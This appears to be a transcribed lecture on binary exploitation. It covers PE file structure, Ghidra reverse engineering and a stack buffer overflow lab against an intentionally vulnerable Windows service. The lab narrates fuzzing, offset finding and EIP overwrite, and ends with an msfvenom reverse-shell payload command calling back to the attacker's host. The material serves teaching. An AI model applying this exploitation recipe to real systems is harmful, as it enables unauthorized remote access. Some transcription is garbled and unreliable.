we'll be discussing about the binary exploitation, understanding memory corruption vulnerabilities, common attack vectors like buffer overflow or format string attacks, then analyzing executables and disassembly. So we'll be discussing about the P file structure and we'll see how to do reverse engineering using Ghidra. Then we'll be understanding the buffer overflow vulnerability, and in that we'll be understanding the stack based buffer overflow vulnerability. We'll be writing our own code and exploiting the buffer overflow vulnerability. Then we'll be talking about the mitigation of it. So that's the small agenda for today. Now let's start with binary exploitation. When we are talking about binary exploitation, so binary exploitation is a advanced topic that involves finding and exploiting vulnerabilities in a binary code, right? And by the successful exploitation of these vulnerabilities, an attacker can gain foothold on the system, escalate the privileges, or bypass the protections, right? So what is this binary, the word binary which we are talking about? What is this binary? So binary file or binary is it is a file containing a set of instructions from a specific instruction set. Instruction is what? When I'm saying the word instruction, so instruction is the set or it is the language of the processor. This is how we can tell the processor to execute a certain task, right? So if I'm writing an instruction, let's say move d word pointer rbp 0x24 eax, right? So this mnemonic is basically how we specify the instruction to the processor. This is an instruction. So this MOV instruction, as the name suggests, it is used to move things around between the memory and the registers. So this is one of the many instructions present in the instruction set. Binary file is a collection of opcodes, right? An opcode is nothing but the sequence of bytes representing a specific instruction. Like move instruction is encoded with bytes 48 and 89 when moving from one register to another, right? So these just represent the instruction. The parameters for that instruction need to be encoded and specified in the opcode according to the syntax, right? So when you find out vulnerabilities in these instructions and how memory handles these instructions, that is called binary exploitation. So when we are talking about binary exploitation, the very first thing we need to understand is binary, right? And this is, as I said, it is an advanced topic, so you will find out vulnerabilities in the binary code, and by exploiting the vulnerabilities, as an attacker you can get the foothold on the system, escalate the privileges, or bypass the protections. So first thing you have to understand is this word binary. So binary is a file which contains a set of instructions, right? Instruction is what? Instruction is the language which your processor understands. So if you want to tell processor to do something, you will tell it in the form of instruction, right? So here if you see I have written an instruction mov d word pointer. So what it will be doing, it will be moving things around or things between memory and the registers, right? So binary file, it is a collection of opcodes like instructions which are generated by the compiler from high level languages like C, C++ or Python. So opcode is nothing but the sequence of bytes representing a specific instruction that what you want the processor to perform, right? And when you find out the handling of the vulnerability in the handling of these binaries and instructions, then that is called binary exploitation. Then we have memory corruption vulnerabilities. Now, memory corruption vulnerability occur when program unintentionally modifies memory in a way that it violates the integrity of its data or control flow. So these flaws are dangerous because they can lead to crashes, data leaks, privilege escalation, or remote code execution. So they are common in low level languages. So the programs written in C or C++, you can find these vulnerabilities, right? Now, buffer overflow is also a kind of memory corruption vulnerability where you corrupt the vulnerability. But there was a vulnerability with the name Dirty Cow in 2016, right? Now, vulnerability was race condition leading to memory corruption, and it affected all the Linux kernel versions. So, Dirty Cow was a vulnerability in the Linux kernel memory subsystem. It allowed the unprivileged local user to gain write access to read-only memory mappings, something that should never happen. So if you are a user in the system and you only have read-only privileges, but you are getting the right privileges, you are able to make changes to the memory mappings. That was the flaw, right? And the flaw was in how the kernel handled the copy on write mechanism. When there are two processes running, right? They shared a memory page, and that memory page is read only. The kernel was supposed to create a private copy for the writing process. But due to a race condition, an attacker could trick the kernel into writing the original read only page, right? So this was the memory corruption vulnerability. How you can mitigate it? So the Linux kernel team, they patched the vulnerability quickly. The distributions released emergency updates. Developers were urged to audit similar race conditions in memory management, right? So this bug was very famous and it was there for 9 years before it was discovered. So for 9 years that this was the problem for all the admins. Yes. So that was memory corruption vulnerability, right? There was another one. Uh, like it was with the name Heartbleed. Have you guys heard of it? So there is OpenSSL, right? So this was a buffer overread in OpenSSL allowed attackers to read memory contents, including private keys, right? There was Stuxnet. That was also, it used multiple memory corruption vulnerabilities to target the industrial control system. So all these are examples of memory corruption vulnerabilities, right? So you should use memory safe languages rather than using C, C++, use Rust, use Go, right? When possible, enable the compiler protection. So you have flags like ASLR, right? DEP, right? Stack canaries, control flow guard. You can use tools like Ghidra to detect the issues if there are any issues. So you can go through the code, right? So that is how you find out the vulnerability, right? And this is your memory based vulnerability. Now these memory based vulnerabilities will be exploited first in the test environment, then in the live environment. Otherwise, it may give you problems, right? The vulnerability will not be exploited, or maybe it will mess the things up with the memory. Then we have analyzing executables and disassembly, right? So we have files which are called PE files. Heard of them? Now, when we talk about PE file, PE stands for portable executable file. So this file format is the standard format for executables, dynamic libraries, and others in Windows, right? And it is based on COF format, Common Object File format, and it is designed to be flexible and extensible, right? Now, when we talk about the structure, when we load a CD or pen drive in a computer disk drive, the CPU understands what to do, irrespective of the operating system, right? Windows or Linux. Similarly, portable executable file is the executable file which can be loaded in the Windows operating system. And the Windows operating system knows what to do with this PE file, right? So have you ever wondered what lies between the Windows executable file or PE file? There are often times will come across depending on the work, like reversing a Windows binary or programming a Windows binary, right? Now Windows have many flavors, right? Windows XP, Windows 10, Windows 7, Windows 11. So in order to support all Windows flavors, the PE file format was created. Right. Now here, if you see in this image, at the very top, we have DOS MZ header. So the first 64 bytes of PE file is known as DOS MZ header, right? Now it has multiple members. Like if I show you, let me open Paint so it will be visible. Here we have DOS MZ header where you have written type define struct, right? Then you have emagic, cblp. So emagic is the magic number. Then ecblp tells you bytes on the last page of the file, right? Ecp pages in the file, crlc relocations, then cpr hdr size of header in paragraph, c min alloc minimum extra paragraphs needed, Emax alloc, maximum extra paragraphs needed. ESS, initial SS value, initial SP value, checksum, initial IP value, then file address of the relocation table, overlay number, reserved words, OEM identifier, OEM information, reserved words, file address of new exe header. So out of these 19 members, this emagic is important. It is the first member of this header, and it is a word. Therefore, it consists of like two first two bytes, like 4D, 5A. That is MZ. That is the meaning MZ. So whenever I block anything, let's say that I want to block something in my network. I don't want any uh, like executable file in my network, right? So for that, what I will do, I will write in my firewall, I will write 4D5A should not be allowed. So 4D5A is the signature of executable file. So the signature of PE file is MZ, right? Which stands for Mark Zipkowski. So the man behind the architecture of PE format. And it is similar to the signature of other format like PDF, right? So this member tells us whether the file is a valid executable file or not, right? Then next, the last one, E underscore LFA new, the last member of the MZ header, which is a D word. That means it consists of 4 bytes of DOS MZ header. It holds the offset to the start of the PE header. So this value is checked by the PE loader of the Windows system, which offset to load for the PE header, which value to load if you want to execute this file, right? That's inside these two things, which are very important. Then we have DOS stub. When we run the PE structure in exe, right? If I'm running portable executable structure dot exe in a 16-bit machine DOS box, it will print this program cannot be run in DOS mode, which is generally an error saying that PE structure.exe is the main code, cannot be run in 16-bit MS DOS, right? So you can modify the strings, right? You can open the DOS stub in tools like, let's say, IDA Pro, right? So the DOS stub may sometimes contain useful information when we are solving some CTF challenges, or which could sometimes only be seen running in 16-bit MS-DOS machine. Then we have PE header, right? PE header is also known as NT header, right? And the structure of header has three members. The 32-bit and 64-bit structure is there, right? And inside that you have signature. So signature of PE header, it has a fixed value which represents the start of the header, right? Then file header. File header is also known as COF header, which consists of 20 bytes of portable executable file, and it holds the information about the physical layout and the properties of the file, right? The number of sections, the pointer to the symbol table, the whole structure, right? Then there is a character called machine, right? So this member is a word that holds 2 bytes to tell us the information about the types of machine. That means 64-bit AMD 64 CPU or i386 CPU, right? So information of the CPU, then number of sections, as I told, then time and date stamp is also there, right? Size of the optional header. What is the size of the optional header? And then there is another one which is called characteristics. So characteristics, it contains a flag which tells whether the file is portable executable or a DLL file, right? Then you have section table. So it immediately follows the PE header. It describes each section like code, data, resources, right? So you have multiple sections. Some of them are dot text, which tells it is executable code. Then dot data, initialize data. Then R data, read only data. Then dot RSRC. resources like icons or dialogues, and dot reloc, relocation info, right? Then you have sections, right? So these sections, section 1, section 2, it can go till section n. Each section contains actual content like code, global variables, import, export tables, debug information, right? And each section has virtual address where it's loaded in memory, raw offset where it's located in the file, permissions like read, write, and execute, and then memory mapping. So when loaded into the memory, sections are aligned to memory page boundaries. Addresses are adjusted using the relocation table if not loaded at the preferred base address. Right? So that is the structure of your portable executable file that you use. Next thing, we have reverse engineering. So reverse engineering is the process of analyzing a system, be it software, be it hardware, or a mechanical product, to understand its design, architecture, and functionality, especially when original source code or documentation is unavailable. So it is widely used in cybersecurity, software development, malware analysis, right? Now, why there is a need of reverse engineering? Understand the legacy systems which have no documentation, analyze malware to detect the behavior and build the defenses, find vulnerabilities and binaries, ensure interoperability with proprietary systems, recover lost source code or intellectual property, right? When we talk about the reverse engineering process related to software, then we have what we do, the very first thing, information gathering, right? So you will collect the binary of the executable file. You will use the tools like strings to extract the metadata. Then comes disassembly, right? You will convert the machine code into assembly code using tools like IDA Pro, Ghidra, or Radar 2. Then happens your decompilation. Now what decompilation will do? Reconstruct high level code to understand logic, right? Then you will do analysis, right? Identify the functions, control flow and data structure, rename variables, and annotate code for clarity, right? And then the last thing that happens is documentation. So record the findings, vulnerabilities, or behaviors for reporting or patching, right? That's what you do in. Now what I'm doing, I'm not just taking any of the binary, I'm just creating my own binary, right? So nano reverse engineer.c, and then hash include stdio.h int main printf hello reverse engineer slash n, and then return 0 and close it. That's a small program. Then I will compile it and convert it into binaries. So let's say my binary name is hello and hyphen o0 hyphen g, So our binary hello is created. If you can see. Now I will load 𝐁𝐢𝐧𝐚𝐫𝐲. So this is our tool 𝐁𝐢𝐧𝐚 where we do the reverse engineering. Alright, so file, new project, non-shared project, name, let's say reverse demo, and then import our binary. Here is our binary. Executable and linking format, program name, hello, okay. So it is giving you the information about the file. So if you read about it, let me just bring it down. Executable location, ELF comment GCC reverse engineer.c was the source file from which it was created, the date when it was created, the hash of it, hash of the file, every single information. Right? I clicked on OK. Now I'll open this file. Let's see what it shows. Now here you can see the whole code where the memory location is, right? So if I see the imports, external, nothing, it is showing exports. In the right hand side, you can see the decompiled view, C like code, right? C program like code for this whole code, right? Then if we have used any labels, so void do global details org. So what you will do, you will this is how you decompile the code. Now after decompiling the code, you will read about the code, right? Now once you read about the code, then you will get to know that where there can be problem, right? So this is how Ghidra or 𝐺hydra reconstruct high level logic from assembly, right? So if there are any function calls, that how those functions are being called, right? Everything will be shown here. Everything you can read and every information you can find out, right? Then you can find out the vulnerability also. Next thing that we have is buffer overflows. Now, when we talk about buffer overflow vulnerability, so we'll have to see that how that buffer overflow vulnerability is exploited and how we can find out the vulnerability. The very first thing that you guys should know while you are talking about buffer overflow kind of vulnerability, that is a extremely sensitive vulnerability. Yes. And when I'm saying that it is an extremely sensitive, so we'll have to exploit it in the test environment, and then we have to exploit it in the production environment. So before that, we have to understand that how this vulnerability is exploited. Yes. So let me show you the memory structure first, and then I'll tell you how we'll exploit it. Buffer overflow is a memory based attack. So in this memory based attack, what we have is we have the memory, right? In the memory, whenever you want to store anything, whenever you write programs, right? So there is the part of the memory where you store the data. Yes. Now, when we are talking about a vulnerability which is buffer overflow, so that vulnerability is basically something which you have to understand by the name, right? So if I'm saying buffer and overflow, so these are the two things which you have to understand extremely well. Buffer is a place in the memory where application stores the input or takes the input from the user. Everyone has like right now we are sitting in the session, right? So while we are sitting in this session, we have a water bottle with us. Whenever we'll feel thirsty, we'll use we'll consume water from that water bottle, so that we don't have to step away from the session, right? So can I say that I'm using that water bottle, or the water is in the buffer with me? Yes. So we have water in our water bottles and we are using it as a buffer. Everyone has used calculators. So when we use calculator, and the working of the calculator, have you seen, like I pressed a number, let's say 5, then it vanishes. When I press plus, it vanishes. And then I press, let's say 7. Then until unless I press equals to, it will not give me the output. I pressed equals to, then it gave me the output. So before pressing equals to sign, this 5 and addition sign and 7, where they were stored in the buffer. Now, when we talk about the memory has multiple places and they are used to store the data. At the very bottom, we have text, right? So that means text based data can be stored, right? So this section stores the code and it's usually the only section of the binary which has executable bit set. That is, the data stored in this section can be executed as code. Then the data section, it is used to store the global variables of the program. So we have two types of variables, global variables and local variables. So the data place is used to store the global variables. Then we have heap. Heap is the area of memory in a computer's process which is different from stack. Stack is used for managing the execution flow and storing of local variables in a structured manner. Heap is used for dynamic memory allocation. So it is used to request memory in the runtime. which we won't be knowing ahead of time, right? Then we have stack. Stack is a last in first out data structure which grows in the memory from top to down. Stack is a scratchpad of a process where it stores local variables of a function and an important pointer that points to the return address where the process needs to jump back after the current function is executed, right? And then at the bottom we have kernel. So kernel manages everything. So there are two data structures, stack and heap. Heap, if we are talking about data getting accumulated, so stack grows in upward direction and heap grows in downward direction. Yes. Now, when you will be putting data in your system, out of all these parameters that you can see on the screen, out of all these parameters, what parameters you know that are growing? It's either a stack or heap. These are the two places where we perform the attack. Now, from our perspective, we know data is being stored. Most of the times, when we talk about applications, they follow stack mostly, right? So that's why when we study buffer overflow, we study about buffer overflow on stack, right? Now, how stack looks like. This is how your stack looks like, right? We have different pointers, right? So when we are talking about stack, there are multiple things in there like functions, right? Whenever you run a program, does your program contains functions? Yes. So those functions need to be stored somewhere. So we store them inside the stack. Do we have parameters also? Yes. We have parameters also. They also need to be stored somewhere. Again, we'll store it in a stack. So these would be couple of things. What about for from both of these can be there. The point below is known as the return pointer. So as I told, it has stack has a pointer that points to the return address where the process needs to jump back after the current function is executed, right? So return pointer will tell that. Then we have another pointer, EIP. This is called instruction pointer. Next to that, we have EBP, base pointer. Then the one where all the points starts, ESP, which is called stack pointer, right? Now the address of a pointer may vary according to the program. Generally, for one program is the value of first pointer is let's say 123, and I'm running the program MS Word, and you are also running the program MS Word. So for both of us, the value might be same. Now let's talk about these pointers. ESP is the pointer where your program execution starts, right? And EBP base pointer is the pointer endpoint, you can say, till that point your program is being executed or it is taking any value. So that's why we call this part as buffer from ESP till EBP. Now when I say overflow, what is my limit? Can I say my limit is from ESP to EBP, from here till here? That's my limit for any user input. If I supersede the limit in an ideal scenario in which there is nothing in terms of which can prevent this type, are we expecting to replace the value of EBP? If I keep on writing, I'll be able to override the value of EBP. If we keep on writing or provide user inputs, will I be able to overwrite EBP? Yes, Again, if I keep on writing, will I be able to replace EIP? Yes. Also, if there is nothing in place, there is no security in place, then I'll be able to do this thing. So we can say that our input is going over the required area, and that which was allocated to us. This is what is overflow. You have been allocated a piece of memory which was from ESP till EBP. If you keep on overwriting, you are overwriting the values of EBP and EIP pointers, right? Now, like I said, EBP contains the address. Till this point, you can keep entering the data. EIP stands for instruction pointer, and this instruction pointer tells what next process is going to be executed. So once I'm done with the first program, what next program will be executed? Its address is stored inside. So what we are doing, we are here talking about RAM. Whatever runs in your system, it goes to the RAM for getting executed. And once the first thing is done, it automatically switches to the next process to execute. So EIP is the place where the memory address of the next process is stored. Now, the thing is that when we are talking about exploitation of the vulnerability, buffer overflow vulnerability. So what we will do, we will fill this buffer area with garbage data, override the value of EBP. Then EIP tells which next process will execute. So we have to control this process. In the place of EIP, I will put the value of ESP. So what will happen? The next process will again go back to ESP. Then I will put a piece of code in the buffer which will give me the access of the target machine or target application which is vulnerable to buffer overflow vulnerability. So what we have this Windows machine, right? Now in this Windows machine, what we have done, we have a application, right? Now this application is intentionally vulnerable to buffer overflow. Now we'll have to see that how we can exploit the buffer overflow vulnerability here. So the very first thing you need to know and you need to understand is for exploiting the buffer overflow vulnerability, you need to find out the size of the buffer, right? Then you will fill it with the exact number of bytes and then you will do the further compromise. Yes. Now, first thing I'll do is I'll find the IP and do the nmap scan for the target machine. Let's see how many ports are open. So if you can see, all these ports are open. Now these ports are open. What I will do, I'll run the application now. Application is running. Now we'll see 192.168.10.134. Now we'll see which port it opened after I started the application. So which port it is using. We have to check that. Now, if you compare the output of the above one and this one, so you will see that a port elite was open. Perfect. Now, what I will do, I will connect to this machine. So, how we can connect? I can use netcat, right? So, when we talk about netcat is a Swiss Army knife which helps you to create connections. It helps you to open the port if you want, and it can help you in any of the things you want, right? If you want to read and write over the network, then also it will help you. So what you have to do, you just have to give the IP 192.168.10.134, let's say, and the port number 31337. So as you can see, we are connected to the target machine. That means the application, the target application, which was vulnerable, right? Then what we have, if I write, let's say Ashish. Hello Ashish. APT. Hello APT. So whatever input we are giving, it is adding hello in front of it, three exclamation mark at the end, and then it is replying back, right? Same thing I want to see just by writing a command, right? So what I will do, I will write a piece of code, right? And that piece of code will tell me that if how it is working. So what I'm doing, I've written import socket. In Python, we are writing the code. R host, the IP of the target machine, R port, the port number. I'm creating a socket, starting a socket. That means I'm connecting to the target machine, right? And then I've taken a variable buff, right? In that variable, I have written Python script, sending that data. Then I'm printing that we have sent the data, and then I will receive the data from the target application, and then print whatever you have received, right? That's what my piece of code is doing. Now, what I will do, I'll close this application and I'll open debugger. So the name of the debugger which we are using is Immunity Debugger. Now this debugger will help you in finding out how stepwise the application is working, how it is crashing, right? So I will load that application in the debugger, then we'll run our application. Now the application is loaded, all the registers are here, and here you can see it is showing the application is paused, right? So you have the play button to play it. So I'll click on play. The application is now in the running phase. Yes. Now let's execute our application and the code, and let's see what it does. So python.py. So it gave me the output. We have sent Python script and we have received the output as hello Python script. That means the application is the target application is working as it is, like we thought it to, right? Next step that we will do is called fuzzing. Fuzzing means I will be sending random bytes of data. I'll keep on increasing the bytes of data, and then I'll see that if it is responding to it, and yes, if it is responding, that how much maximum data we can send to the application, right? If I'm sending, let's say you might have seen like back in the old days, there was a player Winamp or VLC media player is still there. But back in the old days, if you double click on the song or multiple clicks you do on the song, so It basically used to crash the application. So we are now trying to check how our like at how many bytes our application is getting crashed. So what I have done, I've written a script, import socket, import sys, the IP address, right? Then the port number we have written, then the string slash x41. Slash x41 means capital A in hexadecimal format. So 10 times capital A, socket.socket, create a connection with the target, IP and port number are bound, and then try fuzzing with, this is called placeholder, these much bytes of data. So it will print the number of bytes of data it is sending. Then s dot send string plus slash x0 is slash x0d. That means carriage return and new line. So it will be sending the data in every new line. And then I am adding 10 more bytes every time to the string, right? So 10 more bytes will be increased. Then receive the data. If the application crashed, then it will be telling me how many bytes the application got crashed. Now what I will be doing, execute the application. So it says fuzzing with 10 bytes, 20, 30, 40, 50, 60, 70, 80, 90, 100. And at the end, it shows fuzzer crashed at 160 bytes of data, right? Now, fuzzer crashed at 160 bytes of data. That means there might be, uh, like the number of bytes can be between 150 to 160, right? So what we will do, we'll create a pattern. We have a script, msf hyphen pattern underscore create, and create a pattern of 160 bytes, right? Now this pattern is a non-repeatable pattern of 4 bytes every 4 bytes, right? And this pattern has a special hidden thing from which you can find out at how many bytes your application crashed and exactly where it crashed. So we'll use this pattern, right? And we'll use this pattern in the code. So I have written import socket, the IP address, port number, start the socket, start the connect to the port number and IP address, and then in a variable buffer I have pasted the value and then send that value to the target. Now, before doing that, the application was crashed last time. I have to restart it and play it. It's in running state now. Dot slash. Now, when I executed, the application crashed, but it gave me some value at the bottom, if you see. Here, there is the value at the point where my application crashed, 39654138. Now, I'll search it in the database of that, of the place where I created the pattern. So, MSF pattern underscore offset, and the value was 39654138. So it says exact match at offset 146. So that means application crashed at 146 bytes, right? Now let's go a little bit back. So if application crashed at 146 bytes, that means at 146 bytes it has overwritten the value of EBP. Now what I want is I want to see if I am able to override the value of EIP or not, because that's our agenda. I want to override the value of EIP, instruction pointer. So we'll write another code. Nano. Here what I have done, import socket, IP address of the target machine, port number, connect to the target machine, create a socket, offset equals to 146, and EIP equals to B multiplied by 4. That means B 4 times. So what I'm doing, A 146 times, it will fill the buffer, and then B 4 times, which will override the value of EIP, right? And then we'll see if it works or not. So let's restart. Yes. So if I do this, and if I show the screenshot, just a second. Now if you see the value here, EIP, this one, it's written 42, 42, 42. That means B 4 times. So that means we are able to override the value of EIP. So now we just have to do what? We have to override the value of ESP in the place of EIP, write the shell code and get the access. So what I will do, I'll create the code, the exploit code first, right? So don't have to download it from the internet. Like it will be found in the internet also, but the better is you create your own code. Uh, just a second, let me check the IP 10.139. Clear. So the payload generator, we have MSF Venom. So MSF Venom hyphen P Windows slash shell underscore reverse underscore TCP lhost equals to 192.168.10.139, the IP of my own machine. L port equals to 1234, and exit function equals to thread hyphen B slash x0a and slash x00 and hyphen f. The file should be in the Python format. Now it will be creating the code for me. Now this is the exploit code, 1745 bytes. I'll copy it, go back, nano, final.py. So what we have written, the value of ESP, then I have added something called NOPS here. NOPS are what? NOPS stands for no operation. Now the problem is that when I started when I will start writing the code, so what I did, I filled the buffer with the random value, then I have overwritten the value of EIP, change it to the same value as ESP, then I have written my piece of malicious code. So it will not go back, it will keep on overwriting till parameters and functions. NOPS will do that, NOPS will not do anything for a while. So EIP will get time to go back to ESP, then my code will be pasted in the buffer and then my code will execute, so I will get the access, right? So we have restarted the application, our code is written. Now I will play the application. The application is in running stage. Dot slash final dot py. Before that, you have to start listening on port number 1234. So I've started listening. I've opened my port 1234. And once I execute final.py, you can see I'm inside the Windows machine, inside the folder of that application which is vulnerable. This is how you exploit the buffer overflow vulnerability. You do the binary exploitation, right? So that is your buffer overflow vulnerability. You fill the buffer here, then base pointer and the return function. You manipulated the return function and asked it to come back to the same place again. And then you gave your exploit code, which eventually gave you the access. So that was your buffer overflow, and that was it.